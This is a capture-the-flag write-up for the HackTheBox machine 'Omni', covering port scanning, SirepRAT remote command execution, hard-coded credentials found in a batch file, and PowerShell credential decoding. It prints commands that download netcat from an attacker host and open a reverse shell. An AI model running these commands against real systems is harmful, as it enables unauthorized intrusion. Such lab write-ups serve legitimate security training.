HackTheBox: Omni

Enumeration:

Started by enumerating ports:

root@osboxes:~/Documents/Omni# cat scan.txt 
[*] OS based on TTL
Windows
[*] TCP Scan
Open ports: 22,135,5985,8080,29820,29819,29817
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 62:b3:5d:c6:e2:34:c3:0f:c5:86:ee:a3:28:1a:2e:53 (RSA)
|   256 37:1f:0d:0c:31:94:a5:fe:66:e8:f0:09:43:bb:b6:d0 (ECDSA)
|_  256 c7:c7:a0:2f:cc:31:c4:07:7d:87:fb:4d:c9:28:c0:86 (ED25519)
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=9/9%Time=5F591947%P=x86_64-pc-linux-gnu%r(NU
SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Execution time:
	 TTL: 0
	 Furious: 132
	 Nmap: 80
	 Total: 212

After some search on what Windows Device Portal, which is a feature for Windows IoT Core:

Searched for common exploits in Windows IoT Core OS:

User

Used SirepRAT to upload netcat and get a reverse shell:

root@osboxes:~/Documents/Omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\Windows\System32\nc64.exe -Uri http://10.10.15.193:8000/nc64.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
root@osboxes:~/Documents/Omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Windows\System32\nc64.exe -e powershell.exe 10.10.15.193 443"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

After some manual enumeration found some interesting files:

administrator@omni C:\Data\Users\app>type hardening.txt 
- changed default administrator password of "p@ssw0rd" 
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group

PS C:\Data\Users\app> type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

Tried decoding it but got the following error:

PS C:\Data\Users\app> $creds = Import-Clixml -Path .\user.txt
PS C:\Data\Users\app> $creds.GetNetworkCredential();
Key not valid for use in specified state
...

So kept enumerating until found a file that contains user information:

PS C:\Program Files\WindowsPowershell\Modules> type PackageManagement/r.bat
type PackageManagement/r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

Used it to log into the web panel and get a reverse shell as app:
User

Now was able to decode the flag as mentioned before.

Root

To get root just get a reverse shell in the same way that we did for app, then instead of decoding root.txt from the C: drive, enumerated with winpeas:
Shares

The flag was hidden under U: drive.

Resources

https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx